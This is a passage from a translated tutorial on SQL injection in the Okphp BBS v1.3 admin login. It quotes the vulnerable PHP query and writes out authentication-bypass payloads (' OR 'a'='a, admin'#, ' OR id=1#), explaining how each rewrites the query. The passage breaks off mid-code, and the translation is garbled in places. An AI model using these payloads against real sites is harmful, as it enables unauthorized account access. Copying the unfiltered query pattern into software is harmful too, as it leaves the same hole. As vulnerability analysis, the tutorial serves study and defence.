1. Foreword:
Version information: Okphp BBS v1.3 Open Source Edition
Download address: http://www.cncode.com/SoftView.asp?SoftID=1800
Due to the differences between PHP and MYSQL, PHP +MYSQL injection is more difficult than asp, especially the construction of statements during injection. This article mainly uses a simple analysis of some files of Okphp BBS v1.3 to talk about the construction method of php+mysql injection statements. I hope this article It will be of some help to you.
Statement: All the "vulnerabilities" mentioned in the article have not been tested and may not exist at all. In fact, it does not matter whether there are loopholes or not. What is important is the analysis ideas and statement structure.
2. "Vulnerability" analysis:
1. Admin/login.php injection leads to authentication bypass vulnerability:
Code:
$conn=sql_connect($dbhost, $dbuser, $dbpswd, $dbname);
$password = md5($password);
$q = "select id,group_id from $user_table where username='$username' and password='$password'";
$res = sql_query($q, $conn);
$row = sql_fetch_row($res);
$q = "select id,group_id from $user_table where username='$username' and password='$password'" in
$username and $ The password is not filtered and can be easily bypassed.
Methods for modifying statements like select * from $user_table where username='$username' and password='$password' are:
Construction 1 (using logical operations): $username=' OR 'a'=' a $password=' OR 'a'='a
Equivalent to sql statement:
Select * from $user_table where username='' OR 'a'='a' and password='' OR 'a'=' a'
Construction 2 (use the comment statement # in mysql, /* to comment out $password): $username=admin'#(or admin'/*)
That is:
select * from $user_table where username ='admin'#' and password='$password'"
Equivalent to:
select * from $user_table where username='admin'
The $password in the $q statement in admin/login.php is in the query md5 encryption was performed before, so it cannot be bypassed by the statement in construct 1. Here we use construct 2:
select id, group_id from $user_table where username='admin'#' and password='$password'"
Equivalent to:
select id, group_id from $user_table where username='admin'
This is true as long as there is a user named admin. If you don't know the user name, you only know the corresponding id,
We can construct it like this: $username=' OR id=1#
Equivalent to:
select id,group_id from $user_table where username='' OR id=1# and password='$password' (the ones after # are commented out)
Let’s continue looking at the code:
if ($row[0]) {
// If not admin or super moderator
if ($username != "admin" && !eregi("(^|&)3 ($|&)",$row[1])) {
$login = 0;
}
else {
$login = 1;
}
}
// Fail to login- ---------------
if (!$login) {
write_log("Moderator login","0","password wrong");
echo "